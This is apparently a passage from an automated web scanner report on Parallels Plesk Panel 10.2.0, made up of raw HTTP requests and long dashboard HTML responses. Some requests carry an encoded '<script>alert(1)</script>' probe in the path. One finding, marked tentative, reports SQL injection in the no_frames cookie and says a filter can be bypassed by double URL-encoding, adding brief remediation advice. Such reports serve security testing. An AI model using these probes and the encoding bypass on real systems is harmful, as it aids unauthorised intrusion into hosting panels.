domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:33:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:33:02 GMT
Connection: close
Content-Length: 16502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/admin-home.js?1302230704"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="admin-home">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/admin-home/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fadmin-home' + '&activeModule=' + 'adminHome' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"active","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>



<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<div id="statPanel" class="admin-dashboard-box ad-statistics"></div>

<div id="webPanel" class="admin-dashboard-box ad-sites"></div>
<div id="mailPanel" class="admin-dashboard-box ad-mail"></div>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>

<div id="usersPanel" class="admin-dashboard-box ad-users"></div>


<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   
   



new Smb.AdminHome.Panel({
applyTo: 'usersPanel',
title: 'Users',
description: 'Create and manage user accounts and user roles. Assign installed applications to user roles.',
links: [
{title: 'User Accounts', href: '/user/list/'},
{title: 'Create User Account', href: '/user/create/'},
{title: 'User Roles', href: '/role/list/'},
{title: 'Create User Role', href: '/role/create/'}
]
,moreLink: {title: 'More', href: '/user/list/'}
});

new Smb.AdminHome.StatPanel({
applyTo: 'statPanel',
title: 'Statistics on Resource Usage',
description: 'View detailed reports on disk space and traffic usage by services and by months.',
moreLink: {title: 'More', href: '/statistics/'},
stats: [
{
    title: 'Disk space',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B used of 10.0 GB\n'
}, {
title: 'Traffic',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B/month used of 100 GB/month\n'
}
]
});

new Smb.AdminHome.WebSitesPanel({
applyTo: 'webPanel',
title: 'Websites &amp; Domains',
description: 'Add domain names and set up websites. Manage website content and view statistics on how people visit your websites.',
domains: {"1":{"id":1,"name":"vulnerable.host.fqdn","php":true}},
domainId: 1,
subscriptionId: "1",
locale: {
noDomains: 'No websites' },
links: [{"title":"Add Domain","href":"\/web\/add-domain\/"},{"title":"File Manager","href":"\/web\/file-manager\/id\/%%subscriptionId%%\/siteId\/%%domainId%%\/"},{"title":"Secure Your Site with SSL Certificate","href":"\/web\/proxy\/type\/ssl-certificates\/"},{"title":"Statistics","href":"\/statistics\/"}],
moreLink: {title: 'More', href: '/web/view/id/%%subscriptionId%%/'}
});


new Smb.AdminHome.Panel({
applyTo: 'mailPanel',
title: 'Mail',
description: 'Create e-mail addresses and mailing lists. Set up mail forwarding, e-mail aliases, auto-replies, and protection from spam and viruses.',
links: [
{
title: "E-mail Addresses" ,href: "\/email-address\/list\/" },
{
title: "Create E-mail Address" ,href: "\/email-address\/create\/" },
{
title: "Mailing Lists" ,href: "\/mail-list\/list\/" },
{
title: "Create Mailing List" ,href: "\/mail-list\/create\/" },
null
]
,moreLink: {"title":"More","href":"\/email-address\/"} });



new Smb.GettingStartedPopup('top-getting-started-container');
});
//]]>
</script>
</div> <!-- /main -->

<div id="secondary">

<div id="applicationsPanel" class="admin-dashboard-box ad-apps no-aps">
<div id="applicationsPanel-content-area" class="content-wrapper">
<div class="no-aps-msg">
There are no installed applications. </div>
</div>
</div>
<div class="aps-block">
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.AdminHome.Panel({
applyTo: 'applicationsPanel',
title: 'Applications',
description: 'Install apps on your websites. Assign administrative privileges to selected users.' ,
links: [
{title: 'Install Applications', href: '/app/'}
]
});





});
//]]>
</script>
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /smb/web/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted''; psaContext=dashboard; backupftprepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted;

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:33:07 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:33:07 GMT
Connection: close
Content-Length: 16330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/admin-home.js?1302230704"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="admin-home">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/admin-home/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fadmin-home' + '&activeModule=' + 'adminHome' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"active","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>



<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Unable to load object of type BsDomain with id=: Trying to create class BsDomain for not-existent client. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<div id="statPanel" class="admin-dashboard-box ad-statistics"></div>

<div id="webPanel" class="admin-dashboard-box ad-sites"></div>
<div id="mailPanel" class="admin-dashboard-box ad-mail"></div>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>

<div id="usersPanel" class="admin-dashboard-box ad-users"></div>


<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   
   



new Smb.AdminHome.Panel({
applyTo: 'usersPanel',
title: 'Users',
description: 'Create and manage user accounts and user roles. Assign installed applications to user roles.',
links: [
{title: 'User Accounts', href: '/user/list/'},
{title: 'Create User Account', href: '/user/create/'},
{title: 'User Roles', href: '/role/list/'},
{title: 'Create User Role', href: '/role/create/'}
]
,moreLink: {title: 'More', href: '/user/list/'}
});

new Smb.AdminHome.StatPanel({
applyTo: 'statPanel',
title: 'Statistics on Resource Usage',
description: 'View detailed reports on disk space and traffic usage by services and by months.',
moreLink: {title: 'More', href: '/statistics/'},
stats: [
{
    title: 'Disk space',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B used of 10.0 GB\n'
}, {
title: 'Traffic',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B/month used of 100 GB/month\n'
}
]
});

new Smb.AdminHome.WebSitesPanel({
applyTo: 'webPanel',
title: 'Websites &amp; Domains',
description: 'Add domain names and set up websites. Manage website content and view statistics on how people visit your websites.',
domains: {"1":{"id":1,"name":"vulnerable.host.fqdn","php":true}},
domainId: 1,
subscriptionId: "1",
locale: {
noDomains: 'No websites' },
links: [{"title":"Add Domain","href":"\/web\/add-domain\/"},{"title":"File Manager","href":"\/web\/file-manager\/id\/%%subscriptionId%%\/siteId\/%%domainId%%\/"},{"title":"Secure Your Site with SSL Certificate","href":"\/web\/proxy\/type\/ssl-certificates\/"},{"title":"Statistics","href":"\/statistics\/"}],
moreLink: {title: 'More', href: '/web/view/id/%%subscriptionId%%/'}
});


new Smb.AdminHome.Panel({
applyTo: 'mailPanel',
title: 'Mail',
description: 'Create e-mail addresses and mailing lists. Set up mail forwarding, e-mail aliases, auto-replies, and protection from spam and viruses.',
links: [
{
title: "E-mail Addresses" ,href: "\/email-address\/list\/" },
{
title: "Create E-mail Address" ,href: "\/email-address\/create\/" },
{
title: "Mailing Lists" ,href: "\/mail-list\/list\/" },
{
title: "Create Mailing List" ,href: "\/mail-list\/create\/" },
null
]
,moreLink: {"title":"More","href":"\/email-address\/"} });



new Smb.GettingStartedPopup('top-getting-started-container');
});
//]]>
</script>
</div> <!-- /main -->

<div id="secondary">

<div id="applicationsPanel" class="admin-dashboard-box ad-apps no-aps">
<div id="applicationsPanel-content-area" class="content-wrapper">
<div class="no-aps-msg">
There are no installed applications. </div>
</div>
</div>
<div class="aps-block">
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.AdminHome.Panel({
applyTo: 'applicationsPanel',
title: 'Applications',
description: 'Install apps on your websites. Assign administrative privileges to selected users.' ,
links: [
{title: 'Install Applications', href: '/app/'}
]
});





});
//]]>
</script>
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E [no_frames cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

Issue detail

The no_frames cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the no_frames cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the no_frames cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted%2527;

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:34:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:34:00 GMT
Connection: close
Content-Length: 111798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Websites &amp; Domains - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
